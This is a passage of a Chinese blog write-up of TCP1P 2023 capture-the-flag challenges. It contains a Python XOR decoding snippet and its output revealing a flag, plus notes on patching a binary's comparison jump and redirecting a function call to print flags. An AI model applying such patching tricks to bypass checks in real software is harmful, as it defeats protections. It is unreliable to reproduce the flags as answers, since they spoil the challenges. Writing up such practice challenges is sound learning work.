     1, 65, 103, 71, 140, 94, 71, 91, 17, 254, 150, 102, 138, 
     195, 144, 134, 196, 35, 233, 36, 158, 72, 5, 145, 132, 116, 
     214, 129, 14, 199, 129, 137, 113, 12, 41, 25, 187, 211, 144, 
     58, 244, 230, 132, 226, 4, 10, 62, 251, 107, 222, 243, 39, 
     137, 77, 210, 195, 23, 223, 215, 106, 219, 143, 44, 8, 122, 
     137, 138, 91, 245, 75, 73, 93, 91, 197, 27, 82, 14, 106, 
     198, 245, 48, 185, 245, 147, 74, 98, 150, 70, 132, 186, 32, 
     10, 237, 21, 185, 32, 142, 64, 107, 126, 89, 128, 237, 24, 
     44, 6, 6, 40, 171, 20, 228, 138, 5, 217, 231, 18, 248, 171, 
     182, 51, 255, 234, 255, 43, 181, 214, 78, 184, 158, 232, 248, 
     128, 165, 40, 104, 14, 87, 111, 250, 71, 93, 41, 57, 21, 
     120, 32, 107, 242, 97, 20, 196, 25, 243, 77, 125, 77, 92, 
     120, 66, 36, 61, 34, 47, 37, 74, 71, 198, 173, 108, 117, 
     189, 48, 1, 204, 10, 244, 162, 221, 93, 170, 245, 23, 157, 
     143, 93, 35, 162, 32, 9, 116, 165, 242, 19, 197, 86, 29, 
     16, 234, 84, 88, 77, 36, 157, 43, 174, 122, 216, 102, 0, 
     206, 166, 183, 192, 215, 190, 123, 11, 128, 113, 223, 55, 
     10, 116, 92, 64, 184, 192, 76, 68, 54, 51, 45, 73, 189, 227, 
     67, 124, 80, 63, 173, 187, 214, 134, 110, 47, 96, 210, 88, 
     158, 194, 50, 9, 188, 233, 248, 56, 2, 9, 4, 86, 216, 129, 
     123, 221, 89, 12, 230, 129, 187, 179, 205, 100, 56, 247, 229, 
     135, 162, 162, 151, 56, 248, 42, 44, 195, 144, 77, 230, 156, 
     184, 126, 141, 20, 129, 251, 117, 186, 125, 151, 113, 252, 
     15, 77, 228, 15, 75, 55, 144, 240, 118, 214, 79, 49, 128, 
     234, 105, 226, 138, 119, 72, 47, 134, 2, 222, 178, 107, 8, 
     152, 132, 166, 128, 133, 16, 215, 90, 154, 142, 1, 95, 161, 
     128, 62, 172, 94, 133, 253, 255, 242, 231, 99, 103, 203, 95, 
     14, 40, 217, 1, 34, 128, 40, 145, 186, 104, 124, 225, 141, 
     56, 192, 228, 180, 199, 44, 73, 254, 75, 38, 139, 8, 120, 
     7, 140, 141, 219, 21, 7, 226, 90, 144, 144, 240, 40, 247, 
     10, 88, 129, 106, 24, 100, 217, 18, 66, 125, 236, 22, 102, 
     197, 234, 175, 13, 170, 70, 57, 74, 200, 126, 103, 156, 127, 
     248, 30, 97, 181, 179, 85, 154, 80, 106, 154, 238, 194, 104, 
     235, 205, 161, 141, 231, 6, 144, 202, 189, 228, 215, 167, 
     197, 7, 109, 161, 31, 230, 238, 132, 180, 59, 63, 18, 210, 
     124, 20, 185, 232, 54, 96, 109, 75, 64, 143, 239, 85, 29, 
     90, 192, 112, 243, 105, 134, 243, 254, 149, 46, 43, 190, 244, 
     166, 23, 4, 214, 224, 26, 47, 232, 25, 173, 118, 62, 164, 
     172, 65, 36, 25, 175, 103, 83, 181, 127, 105, 243, 168, 89, 
     215, 13, 150, 78, 216, 147, 125, 43, 223, 193, 31, 104, 195, 
     107, 222, 106, 119, 168, 39, 178, 47, 231, 212, 29, 50, 233, 
     124, 216, 116, 248, 114, 215, 109, 3, 163, 48, 74, 161, 80, 
     170, 60, 10, 206, 213, 90, 249, 79, 36, 165, 138, 38, 191, 
     58, 56, 128, 144, 203, 226, 168, 138, 79, 104, 171, 70, 40, 
     99, 166, 218, 163, 201, 124, 245, 85, 68, 28, 86, 217, 225, 
     199, 171, 240, 214, 254, 98, 175, 252, 30, 122, 220, 33, 52, 
     135, 129, 115, 0, 214, 124, 236, 241, 41, 68, 179, 102, 77, 
     64, 35, 232, 180, 37, 194, 226, 236, 42, 7, 209, 183, 107, 
     122, 223, 100, 253, 207, 63, 242, 27, 230, 181, 69, 102, 60, 
     77, 175, 192, 196, 171, 80, 61, 0, 153, 82, 114, 213, 106, 
     179, 38, 225, 213, 5, 106, 88, 195, 241, 241, 13, 32, 192, 
     231, 107, 38, 19, 1, 62, 133, 124, 61, 155, 16, 217, 246, 
     230, 117, 68, 207, 172, 21, 64, 254, 82, 170, 25, 41, 249, 
     167, 160, 74, 188, 245, 26, 158, 40, 33, 95, 210, 25, 105, 
     165, 155, 88, 144, 252, 74, 184, 182, 44, 70, 94, 231, 51, 
     153, 160, 132, 144, 110, 27, 66, 174, 34, 54, 133, 16, 188, 
     239, 197, 250, 84, 189, 241, 181, 169, 244, 14, 250, 83, 245, 
     135, 25, 174, 188, 166, 142, 145, 141, 253, 166, 234, 238, 
     222, 49, 10, 56, 42, 115, 80, 12, 133, 157, 133, 203, 91, 
     129, 159, 173, 121, 17, 124, 241, 158, 79, 128, 73, 156, 209, 
     230, 77, 94, 116, 174, 167, 228, 50, 245, 111, 139, 30, 120, 
     191, 112, 217, 169, 109, 246, 12, 207, 116, 250, 32, 230, 
     223, 50, 25, 52, 160, 234, 99, 153, 141, 30, 127, 170, 19, 
     101, 138, 132, 65, 128, 45, 78, 189, 139, 85, 50, 248, 190, 
     119, 94, 45, 250, 221, 248, 20, 151, 246, 6, 112, 242, 3, 
     231, 200, 50, 196, 118, 86, 255, 116, 112, 115, 46, 17, 19, 
     213, 83, 138, 237, 193, 99, 34, 225, 183, 194, 164, 74, 96, 
     186, 110,  152, 82, 208, 130, 34, 235, 129, 12, 52, 237, 
     38, 244, 208, 89, 234, 86, 215, 209, 188, 67, 12, 56, 197, 
     208, 232, 7]
from Crypto.Util.number import *
from pwn import xor
b = long_to_bytes(int(a,2))
print(xor(b, bytes(FLAG)))

b"Your remarkable accomplishment is a testament to your unwavering determination, relentless pursuit of excellence, and unwavering spirit. You have conquered every obstacle with sheer grit, transforming challenges into stepping stones towards triumph. Your efforts, unwavering focus, and boundless passion have propelled you to new heights of success, leaving an indelible mark on the world. Your commitment to excellence serves as an inspiration to all who have had the privilege of witnessing your remarkable journey. As you stand at this pinnacle of achievement, take a moment to reflect on the incredible journey that brought you here. Embrace this milestone as a testament to your unyielding dedication and the incredible potential that resides within you. Here's the flag : TCP1P{where_the_skies_are_blue_to_see_you_once_again}. The world eagerly awaits the remarkable contributions you will undoubtedly make in the future. Your accomplishment has not only made us proud but also redefined the boundaries of what is possible"

debug me

这是一个巨折和程序,无法反编译,好在它是一个个字符比较的,可以在4cd68处将jnz改为jz然后,在结束前下断点,flag就在栈上

[TCP1P 2023] 部分crypto,pwn,reverse_第1张图片

[TCP1P 2023] 部分crypto,pwn,reverse_第2张图片 

Take some byte

 python 字节码,手工搓

TCP1P{byte_code_is_HuFtt}

Subject Encallment 

本来是有flag输出的,但是没有被调用,需要patch一下,记secretFunction改为printFlag即可。

[TCP1P 2023] 部分crypto,pwn,reverse_第3张图片

你可能感兴趣的:(python,开发语言)

  • 【Python】一文详细介绍 py格式 文件 高斯小哥 Python基础【高质量合集】python新手入门学习
    【Python】一文详细介绍py格式文件个人主页:高斯小哥高质量专栏:Matplotlib之旅:零基础精通数据可视化、Python基础【高质量合集】、PyTorch零基础入门教程希望得到您的订阅和支持~创作高质量博文(平均质量分92+),分享更多关于深度学习、PyTorch、Python领域的优质内容!(希望得到您的关注~)文章目录一、py格式文件简介二、如何创建和编辑py格式文件三、如何运行py
  • python抓包与解包_Python—网络抓包与解包(pcap、dpkt) weixin_39691055 python抓包与解包
    pcap安装[root@localhost~]#pipinstallpypcap抓包与解包#-*-coding:utf-8-*-importpcap,dpktimportre,threading,requests__black_ip=['103.224.249.123','203.66.1.212']#抓包:param1eth_name网卡名,如:eth0,eth3。param2p_type日志捕
  • 华为OD机试 - 单向链表中间节点(Java & JS & Python & C & C++) 华为OD题库 华为od链表java
    须知哈喽,本题库完全免费,收费是为了防止被爬,大家订阅专栏后可以私信联系退款。感谢支持文章目录须知题目描述输出描述解析代码题目描述给定一个单链表L,请编写程序输出L中间结点保存的数据。如果有两个中间结点,则输出第二个中间结点保存的数据。例如:给定L为1→7→5,则输出应该为7;给定L为1→2→3→4,则输出应该为3;输入描述每个输入包含1个测试用例。每个测试用例:第一行给出链表首结点的地址、结点总
  • python 推导式(派生、衍生) sanduo112 人工智能pythonwindows开发语言
    python推导式一、推导式(派生、衍生)1.Python推导式是一种独特的数据处理方式,可以从一个数据序列构建另一个新的数据序列的结构体。2.列表(list)推导式3.字典(dict)推导式4.集合(set)推导式5.元组(tuple)推导式二、代码概述一、推导式(派生、衍生)1.Python推导式是一种独特的数据处理方式,可以从一个数据序列构建另一个新的数据序列的结构体。Python支持各种数
  • 数据挖掘|数据预处理|基于Python的数据标准化方法 皖山文武 数据挖掘数据建模与分析python数据挖掘开发语言
    基于Python的数据标准化方法1.z-score方法2.极差标准化方法3.最大绝对值标准化方法在数据分析之前,通常需要先将数据标准化(Standardization),利用标准化后的数据进行数据分析,以避免属性之间不同度量和取值范围差异造成数据对分析结果的影响。1.z-score方法Z-score方法是基于原始数据的均值和标准差来进行数据标准化的,处理后的数据均值为0,方差为1,符合标准正态分布
  • CSV指南:Python程序获取大型CSV文件行数 孤独打铁匠Julian 笔记经验分享python
    本指南提供了几种使用Python来获取大型CSV文件行数的方法,并解释了每种方法的适用场景。方法1:使用csv.reader处理复杂CSV文件当你的CSV文件中包含多行字段(即某些字段的值中包含换行符)时,使用csv.reader是一个可靠的选择,因为它能够正确处理这些复杂情况。这个方法适用于大多数大小的CSV文件,但是对于非常大的文件,读取整个文件可能会占用较多的时间和内存。对于极大的文件,考虑
  • 谷歌浏览器驱动Chromedriver(114-120版本)文件以及驱动下载教程 pigerr杨 Pythonpythonchromedrivers
    ChromeDriver官方网站GitHub||GoogleChromeLabs/chrome-for-testingChromeDriver113-125_JSONChromeforTestingavailability123-125zip白月黑羽Python基础|进阶|Qt图形界面|Django|自动化测试|性能测试|JS语言|JS前端|原理与安装
  • 大创项目推荐 深度学习 opencv python 公式识别(图像识别 机器视觉) laafeer python
    文章目录0前言1课题说明2效果展示3具体实现4关键代码实现5算法综合效果6最后0前言优质竞赛项目系列,今天要分享的是基于深度学习的数学公式识别算法实现该项目较为新颖,适合作为竞赛课题方向,学长非常推荐!学长这里给一个题目综合评分(每项满分5分)难度系数:3分工作量:4分创新点:4分更多资料,项目分享:https://gitee.com/dancheng-senior/postgraduate1课题
  • python转码 Desamond python开发语言
    转码在许多场景中都有应用,以下是一些常见的场景:网页开发:当用户在网页上输入文本时,可能需要将特殊字符(如空格、引号、特殊符号等)进行转码,以防止这些字符对URL或HTML代码产生干扰。文件名处理:在处理文件名时,可能需要将特殊字符进行转码,以避免文件名被错误地解析或显示。数据传输:在数据传输过程中,为了确保数据的完整性和正确性,可能需要将数据中的特殊字符进行转码。数据存储:在数据库或数据存储中,
  • 排序算法太多?常用排序都在这了,一篇文章总结和实现所有面试会考的排序算法(基于Python实现) 宇宙之一粟 不归路之Python#IT面试题收集与总结数据结构与算法算法数据结构排序算法pythonjava
    文章目录排序算法1.常见的排序算法1.1选择排序1.1.1思想1.1.2实现**1.1.3选择排序分析**1.2冒泡排序**1.2.1思想****1.2.2实现****1.2.3冒泡排序分析**1.3插入排序**1.3.1思想****1.3.2实现****1.3.3插入排序分析**1.4归并排序☆☆★**1.4.1思想****1.4.2实现****1.4.3归并排序分析**1.5快速排序☆★★**
  • 27.Python从入门到精通—Python异常处理 抛出异常 用户自定义异常 定义清理行为 预定义的清理行为 以山河作礼。 #Python基础入门—详解版pythonjava服务器
    27.从入门到精通:Python异常处理抛出异常用户自定义异常定义清理行为预定义的清理行为异常处理抛出异常用户自定义异常定义清理行为预定义的清理行为异常处理在Python中,异常处理是一种处理程序在执行期间可能遇到的错误的方法。当Python解释器遇到错误时,它会引发异常。异常是一种Python对象,它包含有关错误的信息,例如错误类型和错误位置。为了处理异常,您可以使用try-except语句。在
  • python清华大学出版社答案_Python机器学习及实践 weixin_39805119 python清华大学出版社答案
    第1章机器学习的基础知识1.1何谓机器学习1.1.1传感器和海量数据1.1.2机器学习的重要性1.1.3机器学习的表现1.1.4机器学习的主要任务1.1.5选择合适的算法1.1.6机器学习程序的步骤1.2综合分类1.3推荐系统和深度学习1.3.1推荐系统1.3.2深度学习1.4何为Python1.4.1使用Python软件的由来1.4.2为什么使用Python1.4.3Python设计定位1.4.
  • Python | Redis工具类 -拟墨画扇- Pythonredis数据库缓存python
    一、需求自动连接Redis数据库,通过连接池处理数据对输出结果进行Log打印并保存到文件二、代码Utils.redisUtils.py#!/usr/bin/envpython#-*-coding:utf-8-*-importredisfromUtils.loggerimportlog"""Redis数据格式(1)字符串|存储形式:key-value:str-存储二进制数据:可以存储任意类型的数据,
  • Python dict字符串转json对象,小数精度丢失问题 朝如青丝 暮成雪 jsonpython
    一前言JSON(JavaScriptObjectNotation)是一种轻量级的数据交换格式,dict是Python的一种数据格式。本篇介绍一个float数据转换时精度丢失的案例。二问题描述importjsontest_str1='{"π":3.1415926535897932384626433832795028841971}'test_str2='{"value":10.00000}'print
  • Python+Requests模拟发送GET请求 爱学习的执念 自动化测试软件测试技术分享python开发语言
    模拟发送GET请求前置条件:导入requests库一、发送不带参数的get请求代码如下:以百度首页为例importrequests#发送get请求response=requests.get(url="http://www.baidu.com")print(response.content.decode("utf-8"))#以utf-8的编码输出内容二、发送带参数的get请求发送带参数的get请求有
  • Python极速入门:五分钟开启实战之旅! 知白守黑V Python编程语言系统运维python编程语言python开发python学习python入门python数据分析
    1.Python基础语法和结构:了解Python的基本语法,包括变量、数据类型、运算符、注释等。控制流:掌握条件语句(if-elif-else)、循环(for和while)及其控制(break和continue)。函数:学习如何定义和使用函数,包括参数传递、返回值、作用域和闭包。模块和包:理解如何导入和使用模块,以及如何创建和使用自己的包。2.数据处理列表、元组和集合:学习这些序列类型的操作和方法
  • Python Flask 使用数据库 安果移不动 pythonflask开发语言
    pipinstallflask_sqlalchemy官方文档:Flask-SQLAlchemy—Flask-SQLAlchemyDocumentation(3.1.x)为了不报错也需要导入另外两个库#pipinstallflask_sqlalchemy#pipinstallmysqlclient完整代码importosfromflaskimportFlaskfromflask_sqlalchemy
  • PaperWeekly sapienst PapersPaperwithCodeGeneralML
    1.Python软件包解决DL在未见过的数据分布下性能差的问题:(1)神经网络和损失分离的模块化设计(2)强大便捷的基准测试能力(3)易于使用但难以修改(4)github:https://github.com/marrlab/domainlabTrainer和Models之间是什么关系Trainer和Models是DomainLab中的两个核心概念。Trainer是一个用于指导数据流向模型并计算S
  • 使用Python读取Excel文件并计算平均分 嘻嘻爱编码 Python从入门到放弃pythonexcel开发语言
    在这篇博客中,我们将探讨如何使用Python的pandas库来读取Excel文件,并计算其中数据的平均分。pandas是一个强大的数据分析工具,它允许我们以简单直观的方式处理表格数据。安装必要的库在开始之前,确保你的环境中安装了pandas和openpyxl库。可以使用以下命令进行安装:pipinstallpandasopenpyxl读取Excel文件首先,我们需要读取Excel文件。假设我们有一
  • python项目练习——7.网站访问日志分析器 F—— python项目练习python信息可视化数据分析数据挖掘开发语言学习
    项目功能分析:这个项目可以读取网站的访问日志文件,统计访问量、独立访客数、访问来源等信息,并以图表或表格的形式展示出来。这个项目涉及到文件操作、数据处理、数据可视化等方面的技术。示例代码:importrefromcollectionsimportCounterimportmatplotlib.pyplotaspltdefparse_log_file(log_file):#读取日志文件内容witho
  • python的while双重循环九九乘法表 Jinm_R python开发语言
    a=1whilea<=9:b=1#乘数每次需要从1开始whileb<=a:print(f"{a}*{b}={a*b}\t",end='')#\t为制表符使乘法表整齐end=''代表用空格代替换行b+=1a+=1print()#乘数每加一换行
  • 【Python】成功解决ModuleNotFoundError: No module named ‘torchinfo‘ 高斯小哥 BUG解决方案合集pythonpytorch新手入门学习debug
    【Python】成功解决ModuleNotFoundError:Nomodulenamed‘torchinfo’个人主页:高斯小哥高质量专栏:Matplotlib之旅:零基础精通数据可视化、Python基础【高质量合集】、PyTorch零基础入门教程希望得到您的订阅和支持~创作高质量博文(平均质量分92+),分享更多关于深度学习、PyTorch、Python领域的优质内容!(希望得到您的关注~)文
  • Python自动化测试web常见框架汇总 自动化测试薰儿 软件测试技术分享python前端开发语言
    1、前言目前,有非常多的Python框架,用来帮助你更轻松的创建web应用。这些框架把相应的模块组织起来,使得构建应用的时候可以更快捷,也不用去关注一些细节(例如socket和协议),所以需要的都在框架里了。接下来我们会介绍不同的选项。经过初期的不起眼,Python已经成为互联网最流行的服务端编程语言之一。根据W3Techs的统计,它被用于很多的大流量的站点很多的大流量的站点很多的大流量的站点,超
  • python安装jupter在线ide 晚风拂柳颜 生活小经验python3idejupter
    我在虚拟3.6.8的环境里面安装的,具体用了以下命令;pipinstallipython-ihttps://mirrors.aliyun.com/pypi/simple/pipinstalljupyter-ihttps://mirrors.aliyun.com/pypi/simple/jupyternotebook当然,jupter可以直接通过python环境里script目录下的jupyter-
  • opencv 十八 python下实现0缓存掉线重连的rtsp直播流播放器 摸鱼的机器猫 opencv实战opencvpython缓存
    使用opencv打开rtsp视频流时,会因为网络问题导致VideoCapture掉线;也会因为图像的后处理阶段耗时过长导致opencv缓冲区数据堆积,从而使程序无法及时处理最新的数据。为此对cv2.VideoCapture进行封装,实现0缓存掉线重连的rtsp直播流播放器,让程序能一直处理最新的数据。代码实现fromcollectionsimportdequeimportthreadingimpo
  • Windows如何安装poppler库,python的PDF转PPTX项目 跨不过 pdf
    资源库在这里下载https://github.com/oschwartz10612/poppler-windows/releases/tag/v21.03.0其他的参考这篇博客,里面提到的资源链接失效了https://blog.csdn.net/wy01415/article/details/110257130
  • 基于SSM+Vue企业销售培训系统 企业人才培训系统 企业课程培训管理系统 企业文化培训班系统Java 计算机程序老哥
    作者主页:计算机毕业设计老哥有问题可以主页问我一、开发介绍1.1开发环境开发语言:Java数据库:MySQL系统架构:B/S后端:SSM(Spring+SpringMVC+Mybatis)前端:Vue工具:IDEA或者Eclipse,JDK1.8,Maven二、系统介绍2.1图片展示注册登录页面:登陆.png前端页面功能:首页、培训班、在线学习、企业文化、交流论坛、试卷列表、系统公告、留言反馈、个
  • 用Python批量更改图片大小 马达马达达 AIpython
    #提取目录下所有图片,更改尺寸后保存到另一目录fromPILimportImageimportos.pathimportglobdefconvertjpg(jpgfile,outdir,width=128,height=128):img=Image.open(jpgfile)try:new_img=img.resize((width,height),Image.BILINEAR)new_img.s
  • 3.Python数据分析—数据分析入门知识图谱&索引(知识体系中篇) 以山河作礼。 Python数据分析项目数据分析知识图谱数据挖掘python开发语言
    3.Python数据分析—数据分析入门知识图谱&索引-知识体系中篇一·个人简介二·数据获取和处理2.1数据来源:2.2数据清洗:2.2.1缺失值处理:2.2.2异常值处理:2.3数据转换:2.3.1数据类型转换:2.3.2数据编码:2.4数据合并与重塑:2.4.1数据合并:2.4.2数据拼接:2.4.3数据重塑:三·数据探索与分析3.1描述性统计分析3.2数据可视化原则和技巧3.3探索性数据分析(
  • SWIFT环境配置及大模型微调实践 weixin_43870390 swift开发语言ios
    SWIFT环境配置及大模型微调实践SWIFT环境配置基础配置增量配置SWIFTQwen_audio_chat大模型微调实践问题1:问题2:问题定位解决方法手动安装pytorchSWIFT介绍参考:这里SWIFT环境配置基础配置condacreate-nswiftpython=3.8pipinstallms-swift[all]-U#下载项目gitclonehttps://github.com/mo
  • Js函数返回值 _wy_ jsreturn
    一、返回控制与函数结果,语法为:return 表达式;作用: 结束函数执行,返回调用函数,而且把表达式的值作为函数的结果 二、返回控制语法为:return;作用: 结束函数执行,返回调用函数,而且把undefined作为函数的结果 在大多数情况下,为事件处理函数返回false,可以防止默认的事件行为.例如,默认情况下点击一个<a>元素,页面会跳转到该元素href属性
  • MySQL 的 char 与 varchar bylijinnan mysql
    今天发现,create table 时,MySQL 4.1有时会把 char 自动转换成 varchar 测试举例: CREATE TABLE `varcharLessThan4` ( `lastName` varchar(3) ) ; mysql> desc varcharLessThan4; +----------+---------+------+-
  • Quartz——TriggerListener和JobListener eksliang TriggerListenerJobListenerquartz
    转载请出自出处:http://eksliang.iteye.com/blog/2208624 一.概述 listener是一个监听器对象,用于监听scheduler中发生的事件,然后执行相应的操作;你可能已经猜到了,TriggerListeners接受与trigger相关的事件,JobListeners接受与jobs相关的事件。   二.JobListener监听器  j
  • oracle层次查询 18289753290 oracle;层次查询;树查询
    .oracle层次查询(connect  by) oracle的emp表中包含了一列mgr指出谁是雇员的经理,由于经理也是雇员,所以经理的信息也存储在emp表中。这样emp表就是一个自引用表,表中的mgr列是一个自引用列,它指向emp表中的empno列,mgr表示一个员工的管理者, select   empno,mgr,ename,sal  from e
  • 通过反射把map中的属性赋值到实体类bean对象中 酷的飞上天空 javaee泛型类型转换
    使用过struts2后感觉最方便的就是这个框架能自动把表单的参数赋值到action里面的对象中 但现在主要使用Spring框架的MVC,虽然也有@ModelAttribute可以使用但是明显感觉不方便。 好吧,那就自己再造一个轮子吧。 原理都知道,就是利用反射进行字段的赋值,下面贴代码 主要类如下:   import java.lang.reflect.Field; imp
  • SAP HANA数据存储:传统硬盘的瓶颈问题 蓝儿唯美 HANA
    SAPHANA平台有各种各样的应用场景,这也意味着客户的实施方法有许多种选择,关键是如何挑选最适合他们需求的实施方案。 在 《Implementing SAP HANA》这本书中,介绍了SAP平台在现实场景中的运作原理,并给出了实施建议和成功案例供参考。本系列文章节选自《Implementing SAP HANA》,介绍了行存储和列存储的各自特点,以及SAP HANA的数据存储方式如何提升空间压
  • Java Socket 多线程实现文件传输 随便小屋 javasocket
            高级操作系统作业,让用Socket实现文件传输,有些代码也是在网上找的,写的不好,如果大家能用就用上。 客户端类:   package edu.logic.client; import java.io.BufferedInputStream; import java.io.Buffered
  • java初学者路径 aijuans java
    学习Java有没有什么捷径?要想学好Java,首先要知道Java的大致分类。自从Sun推出Java以来,就力图使之无所不包,所以Java发展到现在,按应用来分主要分为三大块:J2SE,J2ME和J2EE,这也就是Sun ONE(Open Net Environment)体系。J2SE就是Java2的标准版,主要用于桌面应用软件的编程;J2ME主要应用于嵌入是系统开发,如手机和PDA的编程;J2EE
  • APP推广 aoyouzi APP推广
    一,免费篇 1,APP推荐类网站自主推荐 最美应用、酷安网、DEMO8、木蚂蚁发现频道等,如果产品独特新颖,还能获取最美应用的评测推荐。PS:推荐简单。只要产品有趣好玩,用户会自主分享传播。例如足迹APP在最美应用推荐一次,几天用户暴增将服务器击垮。 2,各大应用商店首发合作 老实盯着排期,多给应用市场官方负责人献殷勤。 3,论坛贴吧推广 百度知道,百度贴吧,猫扑论坛,天涯社区,豆瓣(
  • JSP转发与重定向 百合不是茶 jspservletJava Webjsp转发
      在servlet和jsp中我们经常需要请求,这时就需要用到转发和重定向;   转发包括;forward和include     例子;forwrad转发;  将请求装法给reg.html页面   关键代码;    req.getRequestDispatcher("reg.html
  • web.xml之jsp-config bijian1013 javaweb.xmlservletjsp-config
    1.作用:主要用于设定JSP页面的相关配置。 2.常见定义: <jsp-config> <taglib> <taglib-uri>URI(定义TLD文件的URI,JSP页面的tablib命令可以经由此URI获取到TLD文件)</tablib-uri> <taglib-location> TLD文件所在的位置
  • JSF2.2 ViewScoped Using CDI sunjing CDIJSF 2.2ViewScoped
    JSF 2.0 introduced annotation @ViewScoped; A bean annotated with this scope maintained its state as long as the user stays on the same view(reloads or navigation - no intervening views). One problem w
  • 【分布式数据一致性二】Zookeeper数据读写一致性 bit1129 zookeeper
    很多文档说Zookeeper是强一致性保证,事实不然。关于一致性模型请参考http://bit1129.iteye.com/blog/2155336    Zookeeper的数据同步协议 Zookeeper采用称为Quorum Based Protocol的数据同步协议。假如Zookeeper集群有N台Zookeeper服务器(N通常取奇数,3台能够满足数据可靠性同时
  • Java开发笔记 白糖_ java开发
    1、Map<key,value>的remove方法只能识别相同类型的key值   Map<Integer,String> map = new HashMap<Integer,String>(); map.put(1,"a"); map.put(2,"b"); map.put(3,"c"
  • 图片黑色阴影 bozch 图片
     .event{ padding:0;    width:460px;    min-width: 460px;    border:0px solid #e4e4e4;    height: 350px;    min-heig
  • 编程之美-饮料供货-动态规划 bylijinnan 动态规划
    import java.util.Arrays; import java.util.Random; public class BeverageSupply { /** * 编程之美 饮料供货 * 设Opt(V’,i)表示从i到n-1种饮料中,总容量为V’的方案中,满意度之和的最大值。 * 那么递归式就应该是:Opt(V’,i)=max{ k * Hi+Op
  • ajax大参数(大数据)提交性能分析 chenbowen00 WebAjax框架浏览器prototype
    近期在项目中发现如下一个问题 项目中有个提交现场事件的功能,该功能主要是在web客户端保存现场数据(主要有截屏,终端日志等信息)然后提交到服务器上方便我们分析定位问题。客户在使用该功能的过程中反应点击提交后反应很慢,大概要等10到20秒的时间浏览器才能操作,期间页面不响应事件。 根据客户描述分析了下的代码流程,很简单,主要通过OCX控件截屏,在将前端的日志等文件使用OCX控件打包,在将之转换为
  • [宇宙与天文]在太空采矿,在太空建造 comsci
         我们在太空进行工业活动...但是不太可能把太空工业产品又运回到地面上进行加工,而一般是在哪里开采,就在哪里加工,太空的微重力环境,可能会使我们的工业产品的制造尺度非常巨大....      地球上制造的最大工业机器是超级油轮和航空母舰,再大些就会遇到困难了,但是在空间船坞中,制造的最大工业机器,可能就没
  • ORACLE中CONSTRAINT的四对属性 daizj oracleCONSTRAINT
    ORACLE中CONSTRAINT的四对属性 summary:在data migrate时,某些表的约束总是困扰着我们,让我们的migratet举步维艰,如何利用约束本身的属性来处理这些问题呢?本文详细介绍了约束的四对属性: Deferrable/not deferrable, Deferred/immediate, enalbe/disable, validate/novalidate,以及如
  • Gradle入门教程 dengkane gradle
    一、寻找gradle的历程 一开始的时候,我们只有一个工程,所有要用到的jar包都放到工程目录下面,时间长了,工程越来越大,使用到的jar包也越来越多,难以理解jar之间的依赖关系。再后来我们把旧的工程拆分到不同的工程里,靠ide来管理工程之间的依赖关系,各工程下的jar包依赖是杂乱的。一段时间后,我们发现用ide来管理项程很不方便,比如不方便脱离ide自动构建,于是我们写自己的ant脚本。再后
  • C语言简单循环示例 dcj3sjt126com c
    # include <stdio.h> int main(void) { int i; int count = 0; int sum = 0; float avg; for (i=1; i<=100; i++) { if (i%2==0) { count++; sum += i; } } avg
  • presentModalViewController 的动画效果 dcj3sjt126com controller
    系统自带(四种效果): presentModalViewController模态的动画效果设置:     [cpp]  view plain copy   UIViewController *detailViewController = [[UIViewController al
  • java 二分查找 shuizhaosi888 二分查找java二分查找
    需求:在排好顺序的一串数字中,找到数字T   一般解法:从左到右扫描数据,其运行花费线性时间O(N)。然而这个算法并没有用到该表已经排序的事实。 /** * * @param array * 顺序数组 * @param t * 要查找对象 * @return */ public stati
  • Spring Security(07)——缓存UserDetails 234390216 ehcache缓存Spring Security
           Spring Security提供了一个实现了可以缓存UserDetails的UserDetailsService实现类,CachingUserDetailsService。该类的构造接收一个用于真正加载UserDetails的UserDetailsService实现类。当需要加载UserDetails时,其首先会从缓存中获取,如果缓存中没
  • Dozer 深层次复制 jayluns VOmavenpo
    最近在做项目上遇到了一些小问题,因为架构在做设计的时候web前段展示用到了vo层,而在后台进行与数据库层操作的时候用到的是Po层。这样在业务层返回vo到控制层,每一次都需要从po-->转化到vo层,用到BeanUtils.copyProperties(source, target)只能复制简单的属性,因为实体类都配置了hibernate那些关联关系,所以它满足不了现在的需求,但后发现还有个很
  • CSS规范整理(摘自懒人图库) a409435341 htmlUIcss浏览器
       刚没事闲着在网上瞎逛,找了一篇CSS规范整理,粗略看了一下后还蛮有一定的道理,并自问是否有这样的规范,这也是初入前端开发的人一个很好的规范吧。 一、文件规范 1、文件均归档至约定的目录中。 具体要求通过豆瓣的CSS规范进行讲解: 所有的CSS分为两大类:通用类和业务类。通用的CSS文件,放在如下目录中: 基本样式库 /css/core
  • C++动态链接库创建与使用 你不认识的休道人 C++dll
    一、创建动态链接库 1.新建工程test中选择”MFC [dll]”dll类型选择第二项"Regular DLL With MFC shared linked",完成 2.在test.h中添加 extern “C” 返回类型 _declspec(dllexport)函数名(参数列表); 3.在test.cpp中最后写 extern “C” 返回类型 _decls
  • Android代码混淆之ProGuard rensanning ProGuard
    Android应用的Java代码,通过反编译apk文件(dex2jar、apktool)很容易得到源代码,所以在release版本的apk中一定要混淆一下一些关键的Java源码。 ProGuard是一个开源的Java代码混淆器(obfuscation)。ADT r8开始它被默认集成到了Android SDK中。 官网: http://proguard.sourceforge.net/
  • 程序员在编程中遇到的奇葩弱智问题 tomcat_oracle jquery编程ide
      现在收集一下:         排名不分先后,按照发言顺序来的。   1、Jquery插件一个通用函数一直报错,尤其是很明显是存在的函数,很有可能就是你没有引入jquery。。。或者版本不对 2、调试半天没变化:不在同一个文件中调试。这个很可怕,我们很多时候会备份好几个项目,改完发现改错了。有个群友说的好:   在汤匙
  • 解决maven-dependency-plugin (goals "copy-dependencies","unpack") is not supported xp9802 dependency
    解决办法:在plugins之前添加如下pluginManagement,二者前后顺序如下:   [html]  view plain copy   <build>           <pluginManagement
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他